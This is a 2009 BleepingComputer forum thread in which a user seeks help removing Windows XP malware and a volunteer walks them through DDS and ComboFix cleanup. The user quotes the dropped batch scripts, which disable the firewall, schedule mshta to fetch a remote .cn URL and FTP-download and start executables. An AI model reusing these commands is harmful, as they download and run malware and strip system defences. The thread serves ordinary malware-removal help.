Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

CPU 100%; Files keep recreating in c:\ root


  • This topic is locked This topic is locked
9 replies to this topic

#1 kdt2121

kdt2121

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:07:41 AM

Posted 19 January 2009 - 05:57 PM

Activity the last week: itunes installed; touchcopy installed; vuze bit torrent program installed.

Machine stays pretty clean, running trend micro internet suite.

Once CPU problem started two days ago, I noticed that I had a lot of strange processes running. I could kill them but they would come back. Not with the same name. Found one entry in the registry that was the name of the process under the iexplorerer UUI section. It was calling one of the processes at that time called eejevkk.exe. I noticed that it was being called from the root directory. I went to the root and found several files that are not normally there. Some were .exe, some were .bat, and some were .txt. I edited a few of them and found commands like the following:

"@echo off
at /delete /yes
at 00:00 /every:M,T,W,Th,F,S,Su mshta.exe http://egntxselsaossawilurx.cn/s_t_t.php
at 00:15 /every:M,T,W,Th,F,S,Su mshta.exe http://egntxselsaossawilurx.cn/s_t_t.php
at 00:30 /every:M,T,W,Th,F,S,Su mshta.exe http://egntxselsaossawilurx.cn/s_t_t.php
at 00:45 /every:M,T,W,Th,F,S,Su mshta.exe http://egntxselsaossawilurx.cn/s_t_t.php
at 01:00 /every:M,T,W,Th,F,S,Su mshta.exe http://egntxselsaossawilurx.cn/s_t_t.php"

Put in code tags in order to deactivate links. ~ OB

and

"qqq
12345
bin
get calc.exe c:\Scdg4OXz.exe
bye"

and

"@echo off
netsh firewall set opmode disable
ftp -s:c:\C2Iy.txt egntxselsaossawilurx.cn
start c:\FKMz4Gx.exe
start c:\FKMz4Gx.exe
start c:\FKMz4Gx.exe"

Here is what I have done:
Booted in safe mode; deleted these .exe, .bat, and .txt files; ran full scan (only found one adaware and fixed);
then checked config.sys and win.ini and could not find anything; then did system restore to 4 days prior at
system checkpoint.
It still showed up so I did all of this again, restoring to a point one week ago.
Still shows up after a few minutes.
Most of the .exe problems are under the system user account
The last thing I did was delete all three instances of calc.exe from the system. I figured I could reinstall later with a good copy. This has only caused a few minor issues for the malware with error messages but it is still there no doubt.

Here is the file generated from the DDS:

DDS (Ver_09-01-18.01) - NTFSx86
Run by 4CastGo at 16:40:20.92 on Mon 01/19/2009
Internet Explorer: 7.0.5730.11
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.2558.1958 [GMT -6:00]

AV: Trend Micro Internet Security *On-access scanning enabled* (Updated)
FW: Norton Internet Security *disabled*
FW: Trend Micro Personal Firewall *enabled*

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Trend Micro\BM\TMBMSRV.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\System32\svchost.exe -k HTTPFilter
C:\WINDOWS\system32\PSIService.exe
C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\svchost.exe -k imgsvc
C:\Program Files\Trend Micro\Internet Security\TmPfw.exe
C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe
C:\WINDOWS\System32\DSentry.exe
C:\Program Files\Trend Micro\Internet Security\TmProxy.exe
C:\WINDOWS\system32\dla\tfswctrl.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Trend Micro\Internet Security\TMAS_OE\TMAS_OEMon.exe
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
c:\qSizbC.exe
c:\fMZjA.exe
C:\WINDOWS\system32\igfxsrvc.exe
C:\WINDOWS\system32\MDM.EXE
C:\Documents and Settings\4CastGo\Desktop\dds.scr
c:\IMTEHNqq.exe
c:\fMZjA.exe
c:\KLuDWS.exe
c:\KLuDWS.exe
c:\GeHn4.exe
c:\KLuDWS.exe
c:\KLuDWS.exe
c:\rTYzKbjc.exe
c:\Gdhk.exe
c:\fMZjA.exe

============== Pseudo HJT Report ===============

uStart Page = hxxp://www.google.com/
uInternet Connection Wizard,ShellNext = hxxp://www.dell4me.com/myway
uInternet Settings,ProxyOverride = *.local
TB: Adobe PDF: {47833539-d0c5-4125-9fa8-0819e2eaac93} - c:\program files\adobe\acrobat

7.0\acrobat\AcroIEFavClient.dll
TB: {0B53EAC3-8D69-4B9E-9B19-A37C9A5676A7} - No File
TB: {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - No File
TB: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - No File
TB: {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
EB: Adobe PDF: {182ec0be-5110-49c8-a062-beb1d02a220b} - c:\program files\adobe\acrobat

7.0\acrobat\AcroIEFavClient.dll
EB: {4528BBE0-4E08-11D5-AD55-00010333D0AD} - No File
EB: Real.com: {fe54fa40-d68c-11d2-98fa-00c0f0318afe} - c:\windows\system32\Shdocvw.dll
EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
uRun: [OE] c:\program files\trend micro\internet security\tmas_oe\TMAS_OEMon.exe
uRun: [DellSupport] "c:\program files\dellsupport\DSAgnt.exe" /startup
uRun: [DellTransferAgent] "c:\documents and settings\all users\application

data\dell\transferagent\TransferAgent.exe"
uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe
mRun: [DVDSentry] c:\windows\system32\DSentry.exe
mRun: [dla] c:\windows\system32\dla\tfswctrl.exe
mRun: [NvMediaCenter] RUNDLL32.EXE c:\windows\system32\NvMcTray.dll,NvTaskbarInit
mRun: [PinnacleDriverCheck] c:\windows\system32\PSDrvCheck.exe -CheckReg
mRun: [igfxtray] c:\windows\system32\igfxtray.exe
mRun: [igfxhkcmd] c:\windows\system32\hkcmd.exe
mRun: [igfxpers] c:\windows\system32\igfxpers.exe
mRun: [UfSeAgnt.exe] "c:\program files\trend micro\internet security\UfSeAgnt.exe"
mRun: [QuickTime Task] "c:\program files\quicktime\qttask.exe" -atboottime
mRun: [TkBellExe] "c:\program files\common files\real\update_ob\realsched.exe" -osboot
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
dRun: [OE] c:\program files\trend micro\internet security\tmas_oe\TMAS_OEMon.exe
dExplorerRun: [MsnHost] c:\CNUb0r.exe
dExplorerRun: [MsnLoad] c:\CNUb0r.exe
dExplorerRun: [MsnConvert] c:\CNUb0r.exe
dExplorerRun: [Msn] c:\CNUb0r.exe
dExplorerRun: [MsnMessendger] c:\CNUb0r.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adobea~1.lnk -

c:\windows\installer\{ac76ba86-1033-0000-7760-000000000002}\SC_Acrobat.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\micros~1.lnk - c:\program

files\microsoft office\office10\OSA.EXE
IE: Convert link target to Adobe PDF - c:\program files\adobe\acrobat

7.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - c:\program files\adobe\acrobat

7.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - c:\program files\adobe\acrobat

7.0\acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - c:\program files\adobe\acrobat

7.0\acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - c:\program files\adobe\acrobat

7.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - c:\program files\adobe\acrobat

7.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - c:\program files\adobe\acrobat

7.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert to existing PDF - c:\program files\adobe\acrobat

7.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: E&xport to Microsoft Excel - c:\progra~1\micros~4\office10\EXCEL.EXE/3000
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
IE: {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - {CAFEEFAC-0015-0000-0004-ABCDEFFEDCBC}

- c:\program files\java\jre1.5.0_04\bin\npjpi150_04.dll
IE: {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - {FE54FA40-D68C-11d2-98FA-00C0F0318AFE} -

c:\windows\system32\Shdocvw.dll
LSP: c:\program files\google\google desktop search\GoogleDesktopNetwork1.dll
Handler: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - c:\program files\common

files\microsoft shared\web folders\pkmcdo.dll
Notify: igfxcui - igfxdev.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} -

c:\windows\system32\WPDShServiceObj.dll
SEH: Microsoft.AntiSpyware.ShellExecuteHook.1: {9ef34ff2-3396-4527-9d27-04c8c1c67806} -

c:\program files\microsoft antispyware\shellextension.dll

================= FIREFOX ===================

FF - ProfilePath -

---- FIREFOX POLICIES ----
c:\program files\mozilla firefox\greprefs\all.js - pref("backups.number_of_prefs_copies", 1);
c:\program files\mozilla firefox\greprefs\all.js - pref("browser.link.open_newwindow.ui", 3); // prefs

UI version
c:\program files\mozilla firefox\greprefs\all.js - pref("capability.policy.default.Window.closed",

"allAccess");
c:\program files\mozilla firefox\greprefs\all.js - pref("capability.policy.default.Window.document",

"allAccess");
c:\program files\mozilla firefox\greprefs\all.js - pref("capability.policy.default.Window.frames",

"allAccess");
c:\program files\mozilla firefox\greprefs\all.js - pref("capability.policy.default.Window.history",

"allAccess");
c:\program files\mozilla firefox\greprefs\all.js - pref("capability.policy.default.Window.length",

"allAccess");
c:\program files\mozilla firefox\greprefs\all.js - pref("capability.policy.default.Window.opener",

"allAccess");
c:\program files\mozilla firefox\greprefs\all.js - pref("capability.policy.default.Window.parent",

"allAccess");
c:\program files\mozilla firefox\greprefs\all.js - pref("capability.policy.default.Window.self",

"allAccess");
c:\program files\mozilla firefox\greprefs\all.js - pref("capability.policy.default.Window.top",

"allAccess");
c:\program files\mozilla firefox\greprefs\all.js - pref("capability.policy.default.Window.window",

"allAccess");
c:\program files\mozilla firefox\greprefs\all.js -

pref("capability.policy.mailnews.DOMParser,parseFromString", "noAccess");
c:\program files\mozilla firefox\greprefs\all.js -

pref("capability.policy.mailnews.DOMParser,parseFromStream", "noAccess");
c:\program files\mozilla firefox\greprefs\all.js - pref("dom.disable_window_open_feature.status",

false);
c:\program files\mozilla firefox\greprefs\all.js - pref("advanced.always_load_images", true);
c:\program files\mozilla firefox\greprefs\all.js - pref("network.protocol-handler.external.help",

false);
c:\program files\mozilla firefox\greprefs\all.js - pref("network.http.connect.timeout", 30); // in

seconds
c:\program files\mozilla firefox\greprefs\all.js - pref("network.http.request.timeout", 120); // in

seconds
c:\program files\mozilla firefox\greprefs\all.js - pref("network.IDN_show_punycode", true);
c:\program files\mozilla firefox\greprefs\all.js - pref("network.image.imageBehavior", 0); //

0-Accept, 1-dontAcceptForeign, 2-dontUse
c:\program files\mozilla firefox\greprefs\all.js - pref("network.cookie.cookieBehavior", 3); //

0-Accept, 1-dontAcceptForeign, 2-dontUse, 3-p3p
c:\program files\mozilla firefox\greprefs\all.js - pref("network.cookie.p3plevel", 1); // 0=low,

1=medium, 2=high, 3=custom
c:\program files\mozilla firefox\greprefs\all.js - pref("network.enablePad", false); // Allow

client to do proxy autodiscovery
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("app.id",

"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}");
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("app.version",
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("app.extensions.version", "1.0");
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("app.build_id",
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("app.update.autoUpdateEnabled",

true); // Whether or not background app updates
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("app.update.url",

"chrome://mozapps/locale/update/update.properties");
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("app.update.updatesAvailable", false);
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("app.update.lastUpdateDate", 0);

// UTC offset when last App update was
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("app.update.performed", false);

// Whether or not an update has been
c:\program files\mozilla firefox\defaults\pref\firefox.js -

pref("extensions.update.autoUpdateEnabled", true);
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("extensions.update.autoUpdate",

false); // Automatically download and install
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("extensions.update.interval",

604800000); // Check for updates to Extensions and
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("extensions.update.lastUpdateDate",

0); // UTC offset when last Extension/Theme
c:\program files\mozilla firefox\defaults\pref\firefox.js -

pref("extensions.update.severity.threshold", 5);// The number of pending Extension/Theme
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("extensions.update.count", 0);

// The number of extension/theme/etc
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("update.interval", 3600000); //

Check each of the above intervals
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("update.showSlidingNotification",

true); // Windows-only slide-up taskbar
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("update.severity", 0);
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("xpinstall.whitelist.add",

"update.mozilla.org,addons.mozilla.org");
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("general.useragent.vendor",

"Firefox");
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("general.useragent.vendorSub",
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("browser.update.resetHomepage",

false);
c:\program files\mozilla firefox\defaults\pref\firefox.js -

pref("browser.startup.homepage_override.1", false);
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("browser.turbo.enabled", false);
c:\program files\mozilla firefox\defaults\pref\firefox.js -

pref("browser.search.param.Google.1.default",

"chrome://browser/content/searchconfig.properties");
c:\program files\mozilla firefox\defaults\pref\firefox.js -

pref("browser.search.param.Google.1.custom",

"chrome://browser/content/searchconfig.properties");
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("update_notifications.enabled", true);
c:\program files\mozilla firefox\defaults\pref\firefox.js -

pref("update_notifications.provider.0.frequency", 7); // number of days
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("browser.xul.error_pages.enabled",

false);
c:\program files\mozilla firefox\defaults\pref\firefox.js - pref("pfs.datasource.url",

"chrome://mozapps/locale/plugins/plugins.properties");

============= SERVICES / DRIVERS ===============

R3 o200avs;Osprey-2X0 AVStream Audio Device;c:\windows\system32\drivers\o200avs.sys

[2004-8-28 114048]
R3 tmcfw;Trend Micro Common Firewall Service;c:\windows\system32\drivers\TM_CFW.sys

[2008-7-30 334352]
R3 WnvCOM;WnvCOM;c:\windows\system32\drivers\WnvCOM.sys [2003-11-7 21672]
R4 tmevtmgr;tmevtmgr;c:\windows\system32\drivers\tmevtmgr.sys [2008-10-27 49680]
R4 TmPfw;Trend Micro Personal Firewall;c:\program files\trend micro\internet security\TmPfw.exe

[2008-10-27 492888]
R4 tmpreflt;tmpreflt;c:\windows\system32\drivers\tmpreflt.sys [2008-7-30 36368]
R4 TmProxy;Trend Micro Proxy Service;c:\program files\trend micro\internet security\TmProxy.exe

[2008-10-27 677128]
S1 Winnov32;Winnov32;c:\windows\system32\drivers\Winnov32.sys [2003-11-7 580123]
S3 WnvKAud;Winnov Kernel Audio;c:\windows\system32\drivers\WnvKAud.sys [2003-11-7

111032]
S3 WnvKVid;Winnov Kernel Video;c:\windows\system32\drivers\WnvKVid.sys [2003-11-7 303740]
S4 WinDriver;WinDriver;c:\windows\system32\drivers\windrvr.sys -->

c:\windows\system32\drivers\WINDRVR.SYS [?]
S4 Wnvirq32Service;wnvirq32 Service;c:\windows\system32\wnvirq32.exe -->

c:\windows\system32\wnvirq32.exe [?]

=============== Created Last 30 ================

2009-01-19 16:31 193,536 a------- C:\ym5fs8Vx.exe
2009-01-19 16:31 193,536 a------- C:\W4VPr.exe
2009-01-19 16:31 193,536 a------- C:\icXHKlJ.exe
2009-01-19 16:31 193,536 a------- C:\CNUb0r.exe
2009-01-19 16:31 193,536 a------- C:\aKc3inRs.exe
2009-01-19 16:20 193,536 a------- C:\Gdhk.exe
2009-01-19 16:20 193,536 a------- C:\SpzqN.exe
2009-01-19 16:20 193,536 a------- C:\iyqLHg8.exe
2009-01-19 16:20 193,536 a------- C:\KLuDWS.exe
2009-01-19 15:54 193,536 a------- C:\HLXKl.exe
2009-01-19 15:53 8,098 a------- C:\ma1DGtd.bat
2009-01-19 15:53 200 a------- C:\npfhBo.bat
2009-01-19 15:30 193,536 a------- C:\fMZjA.exe
2009-01-19 15:30 8,098 a------- C:\C6Vi.bat
2009-01-19 15:30 197 a------- C:\y6eM6Rg.bat
2009-01-19 15:15 193,536 a------- C:\Yg755.exe
2009-01-19 15:15 193,536 a------- C:\qUo0XH.exe
2009-01-19 15:15 193,536 a------- C:\jkI.exe
2009-01-19 15:15 8,098 a------- C:\CsHLey8.bat
2009-01-19 15:15 8,098 a------- C:\aNgpd.bat
2009-01-19 15:15 8,098 a------- C:\Skby.bat
2009-01-19 15:15 201 a------- C:\BSI6.bat
2009-01-19 15:15 200 a------- C:\t1l.bat
2009-01-19 15:15 189 a------- C:\o389rJ5m.bat
2009-01-19 15:02 193,536 a------- C:\rTYzKbjc.exe
2009-01-19 15:02 193,536 a------- C:\qnFOaY.exe
2009-01-19 15:02 193,536 a------- C:\OkB43CtV.exe
2009-01-19 15:02 193,536 a------- C:\Ngt6Vo.exe
2009-01-19 15:01 8,098 a------- C:\T7Sgy3.bat
2009-01-19 15:01 8,098 a------- C:\KhjtU4.bat
2009-01-19 15:01 214 a------- C:\sPYK0.bat
2009-01-19 15:01 8,098 a------- C:\Ux0D.bat
2009-01-19 15:01 200 a------- C:\CMCFluF.bat
2009-01-19 15:01 8,098 a------- C:\Susl.bat
2009-01-19 15:01 213 a------- C:\YDHl.bat
2009-01-19 15:01 203 a------- C:\mGnM6sQ.bat
2009-01-19 14:55 8,098 a------- C:\Upw41ud.bat
2009-01-19 14:55 8,098 a------- C:\VpnbJ.bat
2009-01-19 14:55 8,098 a------- C:\qQrfV.bat
2009-01-19 14:55 8,098 a------- C:\PhF7Of.bat
2009-01-19 14:55 195 a------- C:\iSu6jMfs.bat
2009-01-19 14:55 206 a------- C:\nROYLx0l.bat
2009-01-19 14:55 203 a------- C:\ynTl.bat
2009-01-19 14:55 197 a------- C:\m3le2.bat
2009-01-19 14:16 193,536 a------- C:\xi3glD4M.exe
2009-01-19 14:16 193,536 a------- C:\tCLvuW.exe
2009-01-19 14:16 193,536 a------- C:\IMTEHNqq.exe
2009-01-19 14:15 8,098 a------- C:\LCLi.bat
2009-01-19 14:15 213 a------- C:\yVUWRKN.bat
2009-01-19 14:15 8,098 a------- C:\iNI.bat
2009-01-19 14:15 8,098 a------- C:\bJVMK3IJ.bat
2009-01-19 14:15 212 a------- C:\cKWApvRl.bat
2009-01-19 14:15 203 a------- C:\nQFO.bat
2009-01-19 14:03 193,536 a------- C:\fLiMSaRt.exe
2009-01-19 14:03 193,536 a------- C:\d8zza.exe
2009-01-19 14:03 193,536 a------- C:\BChOh.exe
2009-01-19 14:03 193,536 a------- C:\YIr45NxT.exe
2009-01-19 14:02 8,098 a------- C:\OAr6EjIN.bat
2009-01-19 14:02 8,098 a------- C:\PiXzi.bat
2009-01-19 14:02 215 a------- C:\adJ6BsG.bat
2009-01-19 14:02 195 a------- C:\zni.bat
2009-01-19 14:02 8,098 a------- C:\Jb38D.bat
2009-01-19 14:02 198 a------- C:\lEIQ.bat
2009-01-19 14:02 8,098 a------- C:\cMWkphQ.bat
2009-01-19 14:02 212 a------- C:\CIra.bat
2009-01-19 13:30 193,536 a------- C:\vvc.exe
2009-01-19 13:30 193,536 a------- C:\GeHn4.exe
2009-01-19 13:30 8,098 a------- C:\mb7D.bat
2009-01-19 13:30 8,098 a------- C:\AoRwvS6j.bat
2009-01-19 13:30 200 a------- C:\UwV.bat
2009-01-19 13:30 186 a------- C:\MTKwL.bat
2009-01-19 13:15 193,536 a------- C:\J2bIwOYn.exe
2009-01-19 13:15 193,536 a------- C:\qSizbC.exe
2009-01-19 13:15 8,098 a------- C:\qX5NHn.bat
2009-01-19 13:15 8,098 a------- C:\OMxcmSAC.bat
2009-01-19 13:15 213 a------- C:\PkQB.bat
2009-01-19 13:15 202 a------- C:\SeHgQjsQ.bat
2009-01-19 13:00 193,536 a------- C:\Scdg4OXz.exe
2009-01-19 13:00 193,536 a------- C:\FKMz4Gx.exe
2009-01-19 13:00 8,098 a------- C:\v2ImlOBm.bat
2009-01-19 13:00 213 a------- C:\IXm.bat
2009-01-19 13:00 8,098 a------- C:\MxdI7.bat
2009-01-19 13:00 206 a------- C:\PyYwn7.bat
2009-01-11 16:07 <DIR> --d----- c:\docume~1\alluse~1\applic~1\Azureus
2009-01-11 16:07 <DIR> --d----- c:\docume~1\4castgo\applic~1\Azureus
2009-01-11 16:06 <DIR> --d----- c:\program files\Vuze(2)
2009-01-11 13:13 664 a------- c:\windows\system32\d3d9caps.dat
2009-01-11 10:36 <DIR> --d----- C:\pdf995
2009-01-10 08:31 <DIR> --d----- c:\program files\Wide Angle Software
2009-01-09 19:43 107,368 a------- c:\windows\system32\GEARAspi.dll
2009-01-09 19:43 15,464 a------- c:\windows\system32\drivers\GEARAspiWDM.sys
2009-01-09 19:42 <DIR> --d----- c:\program files\iPod
2009-01-09 19:42 <DIR> --d-----

c:\docume~1\alluse~1\applic~1\{3276BE95_AF08_429F_A64F_CA64CB79BCF6}
2009-01-09 19:41 <DIR> --d----- c:\program files\Bonjour
2009-01-09 19:38 32,000 a------- c:\windows\system32\drivers\usbaapl.sys
2009-01-08 15:58 54,156 a---h--- c:\windows\QTFont.qfn
2009-01-08 15:58 1,409 a------- c:\windows\QTFont.for
2009-01-08 12:48 <DIR> --d----- c:\program files\MSECache
2009-01-08 12:35 4 a------- c:\windows\system32\45B606

==================== Find3M ====================

2009-01-19 16:30 8,098 a------- C:\AliYR070.bat
2009-01-19 16:30 8,098 a------- C:\jEEhk0.bat
2009-01-19 16:30 8,098 a------- C:\A0QUuJU2.bat
2009-01-19 16:30 8,098 a------- C:\JTP0q.bat
2009-01-19 16:30 8,098 a------- C:\Fi1.bat
2009-01-19 16:30 213 a------- C:\QYpF.bat
2009-01-19 16:30 210 a------- C:\wKtIFAPo.bat
2009-01-19 16:30 208 a------- C:\iE42W.bat
2009-01-19 16:30 201 a------- C:\CtVliWMn.bat
2009-01-19 16:30 196 a------- C:\DTJJ.bat
2009-01-11 10:46 3,662 a--sh--- c:\windows\system32\KGyGaAvL.sys
2008-11-26 19:42 205,328 a------- c:\windows\system32\drivers\tmxpflt.sys
2008-11-26 19:42 36,368 a------- c:\windows\system32\drivers\tmpreflt.sys
2008-11-26 19:39 1,195,384 a------- c:\windows\system32\drivers\vsapint.sys
2008-10-26 17:48 2,300 a------- c:\windows\system32\tmp.reg
2008-10-25 19:52 2,760 a------- c:\windows\system32\TDSSlxcp.dll
2008-10-25 12:33 26,112 a------- c:\windows\system32\TDSSoiqh.dll
2007-03-21 08:43 56,912 a------- c:\documents and settings\4castgo\g2mdlhlpx.exe
2007-02-26 15:58 168,000 ac------ c:\docume~1\4castgo\applic~1\GDIPFONTCACHEV1.DAT
2006-12-07 07:44 563,712 a------- c:\documents and settings\4castgo\gotomypc_370.exe
2003-07-25 11:38 132,096 a------- c:\program files\common files\PCSBoff.exe
2007-01-24 17:38 168 ---shr-- c:\windows\system32\E110B07331.sys
2004-09-12 20:26 15,360 a--shr-- c:\windows\system32\shdocpe.dll

============= FINISH: 16:42:30.87 ===============

Attached Files


Edited by Orange Blossom, 19 January 2009 - 10:19 PM.
Deactivate links. ~ OB


BC AdBot (Login to Remove)

 


#2 Thunder

Thunder

  • Members
  • 3,294 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Belgium
  • Local time:03:41 PM

Posted 29 January 2009 - 05:16 PM

Hello Kdt2121 and welcome to Bleeping Computer,

You've got a real mess there. :thumbup2:
Let's see if we can clean this up :

Please read this tutorial carefully to download ComboFix from one of the locations specified, and save it to your Desktop.
Double click the ComboFix icon to run it.
If ComboFix askes you to install the Recovery Console, please do so..
The Windows Recovery Console will allow you to boot up into a special recovery mode, in case your computer has a problem after an attempted removal of malware. This allows us to help you.
Once the Recovery Console is installed, continue with the malware scan.

Note: Make sure not to click ComboFix's window while it's running. That may cause it to stall or freeze.

Please post the log from ComboFix (can also be found as C:\ComboFix.txt) in your next reply. :)

If you have any questions along the way, STOP and ask them before proceeding !!

Greetings,
Thunder
Whatever happens, make believe it was intended to ...
-----------------------------------------------------------------------
Posted Image - If I have helped you in any way, please consider a donation to help me continue the fight against malware.
-----------------------------------------------------------------------
Stand Up & Be Counted --> Posted Image <-- And make a difference

#3 kdt2121

kdt2121
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:07:41 AM

Posted 29 January 2009 - 10:46 PM

Hi,
Ran the Combo fix. Attached is the report.
F.Y.I. lately I have seen dwwin.exe in the processes. Like 20 of them and once Dr. Watson popped up on the screen. I have never loaded this to my knowledge.
thanks,
Kevin

Attached File  ComboFix.txt   36.92KB   9 downloads

#4 Thunder

Thunder

  • Members
  • 3,294 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Belgium
  • Local time:03:41 PM

Posted 30 January 2009 - 07:43 AM

Hello Kevin,

Let's clean up some more :

Open Notepad - don't use any other texteditor than Notepad or the script will fail !
Copy/paste the bold, blue text below into an empty notepad window:File::
C:\vfi.exe
C:\uiGfxhGP.exe
C:\rYI2.exe
C:\OVhQd.exe
C:\JBu.exe
C:\f1wLgMC.exe
C:\bor92Xd1.exe
C:\mIJk.exe
C:\EB9f.exe
C:\qDtr.bat
C:\nEAJViWt.bat
C:\C2nBui.bat
C:\lUOhR.bat
C:\L3X.bat
C:\Lb6dB.bat
C:\NiykmzP.exe
C:\apS.bat
C:\rnHiCqj.bat
C:\ZCmvbz.bat
C:\RQOV14G.bat
C:\wOHB.exe
C:\dnc.bat
C:\bFHP.bat
C:\pi9.bat
C:\rQJCrfv.bat
C:\toTa.bat
C:\ovv.bat
C:\ey2.bat
C:\MHmUS.bat
C:\wuQ3kI9p.bat
C:\QukF9RiZ.bat
C:\iXLzCw.bat
C:\KBuL.bat
C:\ZEciRi.exe
C:\kDXIJj.exe
C:\SrF.bat
C:\JKf.bat
C:\OFTXNtn.exe
C:\eSbui.bat
C:\kU7ED.bat
C:\LtyGv.exe
C:\iVhpo.bat
C:\lJ6gSvWU.bat
C:\hykVBD.exe
C:\KUMq93.bat
C:\zbhL.bat
C:\wClCJYJp.exe
C:\iK5Esk.bat
C:\e5fg.bat
C:\v0jo0UWJ.exe
C:\CBjZGrY.bat
C:\CKWB2nO8.bat
C:\KsPoj.exe
C:\mRe.bat
C:\LMos4y.bat
C:\tDFTn1cx.exe
C:\Rjp.bat
C:\ELs.bat
C:\OeSlVJo8.exe
C:\exOaRt.bat
C:\CzBqMVPH.bat
C:\XpO0.exe
C:\pSkEC7G.bat
C:\DGHiZ.bat
C:\dCOhVsPu.exe
C:\q0a5OR.bat
C:\WQhlh.bat
C:\T7yxR.exe
C:\uDB.bat
C:\O5D.bat
C:\ARJkcY.exe
C:\R0p.bat
C:\IvbzRnZM.bat
C:\cPo6p.exe
C:\hp1.bat
C:\CyU.bat
C:\VJroE.bat
C:\WbVxtta.bat
C:\EDT.exe
C:\BJKBeKl.bat
C:\Y5PGKZ.bat
C:\JDH1.exe
C:\Dbtst.bat
C:\P6cs1.bat
C:\njI.exe
C:\WfowJe.bat
C:\c61593Z.bat
C:\gry48.exe
C:\hMGOb.bat
C:\Upl9EV.bat
C:\XpNUYnl.exe
C:\qRCes.bat
C:\HEmy.bat
C:\cFNGIPE.exe
C:\DCXU4v.bat
C:\ERIG0zM.bat
C:\vlL.exe
C:\a2us.bat
C:\KPAYl.bat
C:\s15.exe
C:\o1KzEkgp.bat
C:\LTV.bat
C:\wZ8zHNKJ.exe
C:\T4e.bat
C:\A0i.bat
C:\VJjXRKE4.exe
C:\UlHi.exe
C:\nFjILPg.exe
C:\YHP.exe
C:\ym5fs8Vx.exe
C:\W4VPr.exe
C:\icXHKlJ.exe
C:\CNUb0r.exe
C:\aKc3inRs.exe
C:\JTP0q.bat
C:\jEEhk0.bat
C:\Fi1.bat
C:\AliYR070.bat
C:\A0QUuJU2.bat
C:\QYpF.bat
C:\wKtIFAPo.bat
C:\iE42W.bat
C:\CtVliWMn.bat
C:\DTJJ.bat
C:\YgDNH2.bat
C:\ulT5ign1.bat
C:\VO8xX4.bat
C:\mAJy8E.bat
C:\zmilPb8g.bat
